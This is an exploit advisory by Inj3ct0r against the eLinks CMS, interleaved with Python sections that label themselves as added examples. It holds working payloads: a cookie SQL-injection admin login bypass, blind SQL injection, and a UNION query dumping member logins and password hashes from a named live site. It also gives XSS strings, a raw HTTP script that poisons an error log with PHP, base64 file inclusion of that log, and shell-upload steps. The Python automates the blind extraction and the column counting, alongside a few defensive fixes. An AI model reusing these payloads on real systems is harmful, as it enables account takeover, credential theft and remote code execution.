
eLinks SQL Injection / XSS / LFI

eLinks SQL Injection / XSS / LFI
Posted Aug 26, 2009
Authored by Inj3ct0r | Site Inj3ct0r.com

eLinks suffers from remote blind SQL injection, cross site scripting, and local file inclusion vulnerabilities.

tags | exploit, remote, local, vulnerability, xss, sql injection, file inclusion
SHA-256 | 75f479a1564d2b980b5f8739423c0eb5c0a094d43eb85fbdada6dd6f263bf614

=====================================================================
[eLinks] Vulnerabilities [blind sql inj / xss / LFI] by Inj3ct0r.com
=====================================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com




# 1 [Bypass Authentication]



Necessary condition: magic_quotes_gpc = Off

The first thing I decided to check was the admin login panel (http://[elinks]/asm_admin.php) for filtering of the fields.
But unfortunately, all POST data goes through the built-in setGPC filter.

[core/asm_config.php]

PHP code:

function setGPC (&$array)
{ // begin function: setGPC
    // Recursively addslashes() every scalar in the array (quotes become \', etc.)
    foreach ($array as $key => $value) {
        if (true == is_array($value)) {
            setGPC($array[$key]);
        } else {
            $array[$key] = addslashes($value);
        }
    }
    reset($array);
} // end function: setGPC
---------------------------
// Only $_POST is escaped; $_GET and $_COOKIE are left untouched
if (!get_magic_quotes_gpc()) {
    setGPC($_POST);
    reset($_POST);
}


As we have seen, only POST data is filtered, which can only please us.
Then I started to explore the authentication algorithm (user authentication).

[core/asm_function.php]


PHP code:

function auth ()
{
    global $api;
    // Session token taken straight from the cookie and never escaped (setGPC only covers $_POST)
    $session = @$_COOKIE['acore'];
    if ($session != '' && $session != '-1')
    {
        if (true == isset($_SESSION['user']['groups'])) { return true; }

        // The cookie value is concatenated directly into the query
        $rs = $api->DB->query("SELECT * FROM asm_s_members WHERE session = '".$session."' LIMIT 1");

        if ($rs->count() == 1)
        {
            $_SESSION['user'] = $rs->row();
            $api->DB->query("UPDATE asm_s_members SET atime = '".time()."' WHERE session = '".$session."' LIMIT 1");
            return true;
        }
    }
    setAuth(0);

}


Authentication is done through the acore cookie, and setGPC() never touches $_COOKIE, so the value goes into the query unescaped (hence the magic_quotes_gpc = Off requirement).
Set the cookie to the value:

word' OR member_id = '1

The resulting query is:

SELECT * FROM asm_s_members WHERE session = 'word' OR member_id = '1' LIMIT 1


Since no session named 'word' can exist, the query returns the administrator's row (member_id = 1); LIMIT 1 keeps $rs->count() at exactly 1, so the check passes.
Refresh the page and you are in the admin panel.
As a result, without knowing any username, we can log in as any user by changing the member_id.
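To see the cookie injection end to end, here is an added Python example (not code from the advisory or from eLinks) that rebuilds the auth() query over an in-memory SQLite table with constructed rows; the table name and columns follow the query above, the row data is made up, and the parameterized variant is the fix:

```python
import sqlite3

# Constructed stand-in for the eLinks asm_s_members table; rows and hashes are made up.
MEMBERS = [
    (1, "admin", "constructed-admin-hash", "k8s2j1tokenadmin"),
    (2, "editor", "constructed-editor-hash", "p0q9w8tokeneditor"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE asm_s_members "
               "(member_id INTEGER, user_login TEXT, user_pass TEXT, session TEXT)")
    db.executemany("INSERT INTO asm_s_members VALUES (?, ?, ?, ?)", MEMBERS)
    return db


def auth_vulnerable(db, acore_cookie):
    """Same shape as auth() in core/asm_function.php: the raw cookie is
    concatenated into the SQL. setGPC() only addslashes() $_POST, so with
    magic_quotes_gpc = Off nothing escapes the cookie."""
    sql = ("SELECT member_id, user_login FROM asm_s_members "
           "WHERE session = '" + acore_cookie + "' LIMIT 1")
    rows = db.execute(sql).fetchall()
    # auth() requires $rs->count() == 1; LIMIT 1 guarantees that for the payload
    return rows[0] if len(rows) == 1 else None


def auth_parameterized(db, acore_cookie):
    """The fix: bind the cookie as a parameter, so the quote in the payload is data."""
    sql = ("SELECT member_id, user_login FROM asm_s_members "
           "WHERE session = ? LIMIT 1")
    rows = db.execute(sql, (acore_cookie,)).fetchall()
    return rows[0] if len(rows) == 1 else None


# Cookie value from the advisory; change the id to log in as another member
BYPASS_COOKIE = "word' OR member_id = '1"

if __name__ == "__main__":
    db = make_db()
    print(auth_vulnerable(db, BYPASS_COOKIE))               # (1, 'admin')
    print(auth_vulnerable(db, "word' OR member_id = '2"))  # (2, 'editor')
    print(auth_parameterized(db, BYPASS_COOKIE))           # None
```

The parameterized query is the real fix; escaping cookies with addslashes() in setGPC() would only paper over this one sink while leaving every other concatenated query in the code base as it is.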



# 2 Blind SQL inj3ct0r in the search:


Necessary condition: magic_quotes_gpc = Off

http://www.***.com/eLinks-search.php?action=search&word=asian'+or+1=1+and+substring(version(),1,1)=5--+1
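The payload above is a boolean oracle: a true condition turns `asian' or 1=1 ...` into a match for every row, a false one matches nothing, and that single bit is enough to read out any expression one character at a time. The following added Python example (not from the advisory or from eLinks) runs that loop against an in-memory SQLite stand-in for the search query; SQLite's substr() and sqlite_version() replace MySQL's substring() and version(), the link rows are constructed, and the comparison is against a quoted character because SQLite does not coerce '5' to 5 the way MySQL does:

```python
import sqlite3
import string

# Constructed link table standing in for the eLinks search backend.
LINKS = [(1, "asian food"), (2, "asian art"), (3, "other")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE links (id INTEGER, word TEXT)")
    db.executemany("INSERT INTO links VALUES (?, ?)", LINKS)
    return db


def search_vulnerable(db, word):
    """Stands in for eLinks-search.php?action=search&word=...: the parameter is
    concatenated unescaped (magic_quotes_gpc = Off, and setGPC() skips $_GET)."""
    sql = "SELECT id FROM links WHERE word LIKE '%" + word + "%'"
    return db.execute(sql).fetchall()


def oracle(db, condition):
    """Boolean oracle built from the advisory's payload shape:
        asian' or 1=1 and <condition>-- 1
    True condition -> every row matches -> results page; false -> no results.
    The trailing ' 1' matters on MySQL, where -- needs whitespace after it."""
    payload = "asian' or 1=1 and " + condition + "-- 1"
    return len(search_vulnerable(db, payload)) > 0


def extract(db, expr, alphabet=string.digits + string.ascii_letters + ".-_", max_len=32):
    """Recover the value of a SQL expression one character at a time.
    The advisory tests substring(version(),1,1)=5 on MySQL; SQLite has
    substr() and sqlite_version(), so those are used here."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if oracle(db, "substr(%s,%d,1)='%s'" % (expr, pos, ch)):
                out += ch
                break
        else:
            break  # no candidate matched: we are past the end of the string
    return out


def direct_value(db, expr):
    """Ground truth for comparison: the expression queried honestly."""
    return db.execute("SELECT " + expr).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print(extract(db, "sqlite_version()"), "==", direct_value(db, "sqlite_version()"))
```

Against the real target the oracle is the presence or absence of results in the returned HTML and every character costs one request per candidate, which is why real tooling bisects on the character code instead of walking an alphabet.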

Shell :

In the admin panel go to the template editor. There are not enough rights to edit the templates, but it can create files:
in the page source of the form, change the hidden field holding the file name to:

<input type="hidden" name="template_name" value="../../../../../home/tgp/***/links/1.php">

The name is joined into the path as-is, so the ../ sequences walk out of the template directory and the file is written wherever you point it.
Getting a shell.

# XSS :

/v2/searcherror.php?errormsg=<script>alert(/asd/);</script>

eLinks-search.php?action=result&word=%3Cscript%3Ealert('xss');%3C/script%3E&user_key=1601668980&page=1&pages=-0

# Sql inj3ct0r :

...modules/content/pub.content.php?url=/celebs/view&view=[sql inj]


sample:

http://yobt.com/modules/content/pub.content.php?url=/celebs/view&view=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(user_login,0x3a,user_pass),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+asm_s_members+limit+0,1/*
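Before a UNION like the one above can be used, the number of columns in the original SELECT has to be found (29 on that target). This added Python example, not from the advisory or from eLinks, does both steps against an in-memory SQLite stand-in with constructed tables: ORDER BY probing for the column count, then the UNION pulling user_login:user_pass out of asm_s_members; `||` and ':' replace MySQL's concat(user_login,0x3a,user_pass):

```python
import sqlite3

# Constructed tables standing in for eLinks content and member storage (made-up data).


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE content (id INTEGER, title TEXT, body TEXT)")
    db.execute("INSERT INTO content VALUES (1, 'celeb one', 'text')")
    db.execute("CREATE TABLE asm_s_members (member_id INTEGER, user_login TEXT, user_pass TEXT)")
    db.execute("INSERT INTO asm_s_members VALUES (1, 'admin', 'constructed-hash')")
    return db


def view_vulnerable(db, view):
    """Stands in for pub.content.php?url=/celebs/view&view=...: 'view' is
    concatenated into the WHERE clause unescaped."""
    sql = "SELECT id, title, body FROM content WHERE id = '" + view + "'"
    return db.execute(sql).fetchall()


def find_column_count(db, max_cols=40):
    """Step 1: ORDER BY n errors once n exceeds the column count of the
    original SELECT. The advisory's target needed 29 columns; this table has 3.
    The /* opens a comment that swallows the closing quote the script appends."""
    for n in range(1, max_cols + 1):
        try:
            view_vulnerable(db, "1' ORDER BY %d/*" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_credentials(db, ncols, target_col=1):
    """Step 2: UNION a row from asm_s_members. -1 matches no real row, so the
    only row returned is ours, with user_login:user_pass in target_col.
    MySQL: concat(user_login,0x3a,user_pass); SQLite: user_login||':'||user_pass."""
    cols = ["NULL"] * ncols
    cols[target_col] = "user_login || ':' || user_pass"
    payload = ("-1' UNION SELECT " + ", ".join(cols)
               + " FROM asm_s_members LIMIT 0,1/*")
    rows = view_vulnerable(db, payload)
    return rows[0][target_col] if rows else None


if __name__ == "__main__":
    db = make_db()
    n = find_column_count(db)
    print(n, dump_credentials(db, n))  # 3 admin:constructed-hash
```

On the real page the useful target column is whichever of the 29 is echoed into the HTML; the advisory found column 13 by the same trial.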

# Elinks LFI :


1. Log in at asm_admin.php with any username and password;

2. You get the "wrong password" message, but nevertheless $_SESSION['user']['member_id'] is set to 0;

3. ./core/asm_config.php :

PHP code:

if ( strpos($_SERVER['HTTP_USER_AGENT'], 'vdebug') ) { set_error_handler('error_handler'); }
// NB: strpos() returns the offset and 0 is false, so 'vdebug' must not be the very first thing in the User-Agent
function error_handler ($errno, $errmsg, $filename, $linenum, $vars)
{ // BEGIN function
    if ($errno == 2048 || error_reporting() == 0) { return true; } // 2048 = E_STRICT

    $error_file = $_SERVER['DOCUMENT_ROOT'].'/files/logs/error.xml';
    // Request URL, referer and user agent are all client-controlled and written without any escaping
    $_request_url = (true == isset($_SERVER['REQUEST_URI'])) ? 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'] : 'http://'.$_SERVER['HTTP_HOST'].'/';
    $_http_referer = (true == isset($_SERVER['HTTP_REFERER'])) ? $_SERVER['HTTP_REFERER'] : '';
    $_remote_addr = (true == isset($_SERVER['REMOTE_ADDR'])) ? $_SERVER['REMOTE_ADDR'] : '';
    $_http_user_agent = (true == isset($_SERVER['HTTP_USER_AGENT'])) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $error_content = '
<error date="'.date("Y-m-d H:i:s").'">
<request_url>'.$_request_url.'</request_url>
<http_referer>'.$_http_referer.'</http_referer>
<remote_addr>'.$_remote_addr.'</remote_addr>
<http_user_agent>'.$_http_user_agent.'</http_user_agent>
<error_number>'.$errno.'</error_number>
<error_message>'.$errmsg.'</error_message>
<file_name>'.$filename.'</file_name>
<line_number>'.$linenum.'</line_number>
</error>
</xml>';
    $fp = @fopen($error_file, 'r+');
    if ($fp) {
        // Seek back over the trailing "</xml>\n" (7 bytes) so the new entry overwrites it and re-closes the document
        $cursor_position = filesize($error_file)-7;
        fseek($fp, $cursor_position);
        fwrite($fp, $error_content);
        fclose($fp);
    } else {
        $fp = fopen($error_file, 'w');
        if ($fp) {
            fwrite($fp, "<xml>\n".$error_content);
            fclose($fp);
        }
    }
} // END function


4. To reach this code, send an HTTP request with the help of a script:

PHP code:

<?php

set_time_limit(0);
$site = 'yobt.com';
$path = '/asm_admin.php?update=1';

$fp = fsockopen($site, 80, $errno, $errstr, 30);
if (!$fp) { die("connect failed: $errstr ($errno)\n"); }

$out  = "GET $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
$out .= "Connection: Close\r\n";
// here is our code for the include; 'vdebug' must follow other text because strpos() returning 0 is false
$out .= "User-Agent: Opera vdebug <?php phpinfo() ?>\r\n";
$out .= "Referer: http://laa.com\r\n";

$out .= "Cookie: 1=2;\r\n\r\n";

fwrite($fp, $out);

while (!feof($fp))
{
    print fread($fp, 4800);
}
fclose($fp);
print $out;


?>


Instead of asm_admin.php?update=1 you can use any other file that raises a PHP error (for this site http://yobt.com/asm.pornstars.search.php works);


5. My phpinfo, as the code prescribes, is appended to ./files/logs/error.xml;

6. In ./asm_clean.php the authentication check passes:

PHP code:

if (isset($_SESSION['user']['member_id']) != '1' && SERVER_IP != $_SERVER['REMOTE_ADDR']) {
die('Access denied');
}


(because we logged in at the admin panel earlier and $_SESSION['user']['member_id'] exists: isset() returns a boolean, and under PHP's loose comparison true != '1' is false, so the check is satisfied by any session in which member_id is set at all, even to 0 after a failed login);

7. Further down in the code we see:

PHP code:

if (false == isset($_GET['asm'])) { die('Map command not found'); }
$file = base64_decode($_GET['asm']);
...
include(PATH.$file);


8. All that is left is to include our error.xml =)
http://yobt.com/asm_clean.php?asm=L2ZpbGVzL2xvZ3MvZXJyb3IueG1s (the parameter is base64 of /files/logs/error.xml) shows the phpinfo output (provided, of course, that you are authorized as described above)
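The chain in steps 1 to 8 comes down to three things: a User-Agent that makes strpos() truthy and carries PHP, a request that raises an error so error_handler() writes that header into files/logs/error.xml, and the base64 name of that file for asm_clean.php. The added Python example below (not the advisory's script and not eLinks code) builds the request offline, computes the asm parameter, and adds the defender-side counterpart: a scan of error.xml for PHP open tags in the client-controlled fields the handler writes. The hostname, the paths and the sample log are constructed; the same poisoned file is also what asm_xml_content.php eval()s in the variant that follows.

```python
import base64
import re


def user_agent_triggers_handler(user_agent):
    """core/asm_config.php tests `if (strpos($_SERVER['HTTP_USER_AGENT'], 'vdebug'))`.
    strpos() returns the match offset, and offset 0 is false in PHP, so
    'vdebug' has to appear after at least one other character."""
    return user_agent.find("vdebug") > 0


def build_poison_request(host, path, php_payload):
    """Raw HTTP/1.1 request doing what the advisory's fsockopen script does:
    the PHP rides in User-Agent, which error_handler() copies verbatim into
    files/logs/error.xml. The path must be one that raises a PHP notice or warning."""
    ua = "Opera vdebug " + php_payload
    lines = [
        "GET %s HTTP/1.1" % path,
        "Host: " + host,
        "User-Agent: " + ua,
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def asm_param(relative_path):
    """asm_clean.php does include(PATH.base64_decode($_GET['asm']))."""
    return base64.b64encode(relative_path.encode()).decode()


# Constructed error.xml in the layout error_handler() writes; not a real log.
SAMPLE_ERROR_XML = """<xml>
<error date="2009-08-26 12:00:00">
<request_url>http://host.example/asm_admin.php?update=1</request_url>
<http_referer></http_referer>
<remote_addr>203.0.113.5</remote_addr>
<http_user_agent>Mozilla/5.0</http_user_agent>
<error_number>8</error_number>
<error_message>Undefined variable</error_message>
<file_name>/var/www/asm_admin.php</file_name>
<line_number>10</line_number>
</error>
<error date="2009-08-26 12:00:01">
<request_url>http://host.example/asm_admin.php?update=1</request_url>
<http_referer>http://laa.com</http_referer>
<remote_addr>203.0.113.5</remote_addr>
<http_user_agent>Opera vdebug <?php phpinfo() ?></http_user_agent>
<error_number>8</error_number>
<error_message>Undefined variable</error_message>
<file_name>/var/www/asm_admin.php</file_name>
<line_number>10</line_number>
</error>
</xml>"""

PHP_OPEN_TAG = re.compile(r"<\?(php\b|=)?", re.IGNORECASE)
# Every field the handler fills from the request: all three are writable by the client
CLIENT_FIELDS = re.compile(r"<(http_user_agent|http_referer|request_url)>(.*?)</\1>", re.S)


def poisoned_entries(error_xml):
    """Defender-side check over error.xml: each client-controlled field the
    handler writes is scanned for a PHP open tag. Returns (field, value)
    pairs that look like poisoning attempts."""
    return [(field, value) for field, value in CLIENT_FIELDS.findall(error_xml)
            if PHP_OPEN_TAG.search(value)]


if __name__ == "__main__":
    print(build_poison_request("host.example", "/asm_admin.php?update=1", "<?php phpinfo() ?>").decode())
    print(asm_param("/files/logs/error.xml"))  # L2ZpbGVzL2xvZ3MvZXJyb3IueG1s
    print(poisoned_entries(SAMPLE_ERROR_XML))
```

The scan covers the referer and request URL as well as the user agent because error_handler() writes all three unescaped; only the user agent is used in the advisory, but nothing in the handler treats the others differently.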



--------------------------------------------------------------------------

Elinks arbitrary code execution
(not applicable to this site, because the admins removed the default file ./core/asm_xml_content.php from the distribution, but still)

1. ./core/asm_xml_content.php

PHP code:

<?php
error_reporting(7);
$page = (true == isset($_GET['page'])) ? $_GET['page'] : 'index';
// 'page' is joined into the path unfiltered, so ../ reaches any .xml under DOCUMENT_ROOT
$page = $_SERVER['DOCUMENT_ROOT'].'/files/tpl/'.$page.'.xml';

if (true == file_exists($page)) {
    $filemtime = filemtime($page);
    $filemtime = ($filemtime > 10000) ? $filemtime : time()+3600;
    $fp = fopen($page, 'r');
    $content = fread($fp, filesize($page));
    fclose($fp);
    // The file body is wrapped in ?> ... <?php and eval()'d, so any <?php ... ?> inside it executes
    $content = "?>".$content."<?php ";
    ob_start();
    eval ($content);
    // ... (rest of the file omitted in the advisory)
}



2. Add our PHP code to ./files/logs/error.xml in the manner described above;
3. Run our code via http://elinks/core/asm_xml_content.php?page=../logs/error (the script appends .xml, and files/tpl/../logs/error.xml is the poisoned log)

-----------------------------------------

Local include :

core/xmlrpc.php

PHP code:

$xmlrpc_server = trim( $_GET['xmlrpc_server'] );
$uri = parse_url( $_SERVER['REQUEST_URI'] );
if ( $uri['query'] )
{
    // $_GET is rebuilt from the raw query string; xmlrpc_server is still never filtered
    parse_str( $uri['query'], $_GET );
}
// The value goes into the path unfiltered; only is_file() and the fixed /xmlrpc_server.php suffix constrain it
if ( true == is_file( PATH."/modules/".$xmlrpc_server."/xmlrpc_server.php" ) )
{
    include_once( PATH."/modules/".$xmlrpc_server."/xmlrpc_server.php" );
    // ... (rest omitted in the advisory)
}


As we can see, the data from $_GET['xmlrpc_server'] goes into the include without any filtering. Note that is_file() must succeed and the path always ends in /xmlrpc_server.php, so plain directory traversal only reaches a file of that name.

Example:

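Both the template editor's hidden template_name field (the ../../ payload earlier in this advisory) and xmlrpc_server above fail for the same reason: a client-supplied string is joined into a filesystem path with no check that the result stays where it belongs. This added Python example (not code from the advisory or from eLinks; the install paths are hypothetical) shows the two checks that close it: path confinement for a file name that may legitimately contain subdirectories, and an allowlisted bare name for a module directory.

```python
import os
import re

# Hypothetical install paths; the advisory does not give the real layout.
TPL_DIR = "/srv/elinks/files/tpl"
PATH_ROOT = "/srv/elinks"

MODULE_NAME = re.compile(r"^[A-Za-z0-9_]+$")


def confine(base_dir, user_path):
    """Resolve user_path under base_dir and refuse anything that escapes it.
    normpath() collapses the ../ segments the template_name payload relies on;
    when base_dir exists on disk, os.path.realpath() should be applied to the
    result as well so a symlink inside the base cannot point outside it."""
    if not user_path or "\x00" in user_path or os.path.isabs(user_path):
        return None
    base = os.path.normpath(os.path.abspath(base_dir))
    target = os.path.normpath(os.path.join(base, user_path))
    if target == base or os.path.commonpath([base, target]) != base:
        return None
    return target


def template_save_path(template_name):
    """Hardened version of the template editor's file-name handling."""
    return confine(TPL_DIR, template_name)


def xmlrpc_module_path(xmlrpc_server):
    """Hardened version of core/xmlrpc.php: allow only a bare module name,
    never a path, before it is joined into the include."""
    if not MODULE_NAME.match(xmlrpc_server):
        return None
    return os.path.join(PATH_ROOT, "modules", xmlrpc_server, "xmlrpc_server.php")


if __name__ == "__main__":
    # Payload from the advisory's hidden field (the *** is as written there)
    print(template_save_path("../../../../../home/tgp/***/links/1.php"))  # None
    print(template_save_path("main.tpl"))
    print(xmlrpc_module_path("../../tmp"))  # None
    print(xmlrpc_module_path("blog"))
```

The allowlist is the stronger of the two and should be preferred wherever the legitimate values are plain names; confinement is for the case where subdirectories are a feature.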

Get shell :

A shell can also be obtained via Content Manager -> Content Blocks.
Add a new block:

Name: whatever
Alias: s.php
Content: <?php phpinfo(); ?>
Status: inactive

Get Shell: /files/blocks/.s.php

ThE End =] Visit my proj3ct :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net

# ~ - [ [ : Inj3ct0r : ] ]